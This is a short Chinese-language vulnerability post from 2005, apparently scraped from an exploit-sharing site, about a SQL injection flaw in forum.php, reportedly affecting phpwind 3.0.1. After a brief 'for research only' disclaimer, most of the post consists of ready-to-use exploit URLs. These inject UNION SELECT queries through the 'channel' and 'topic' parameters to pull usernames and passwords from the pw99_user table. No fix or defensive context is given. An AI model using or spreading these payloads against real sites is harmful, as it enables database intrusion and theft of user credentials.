输出确认错误:forum.php注入漏洞
来源:岁月联盟
时间:2005-12-17
CVE: CVE-MAP-NOMATCH
forum.php注入漏洞
forum.php很多php网站都有这个页面。包括现在流行的phpwind3.0.1,破坏性很大。
希望合理利用,本站仅供技术研究,一切漏洞带来的责任无本站无关。
by rose
利用方式如下:
--------------------
//-------1---------//
http://WWW.xxxx.COM/xxxx/forum.php?modul=topics&channel=[SQL]
http://WWW.xxxx.COM/xxxx/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
//-------2--------//
http://WWW.xxxxx.COM/xxxx/forum.php?modul=posting&topic=[SQL]&channel=3
http://oWWW.xxxx.COM/xxxx/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3
上一篇:TML CMS多个输入验证漏洞
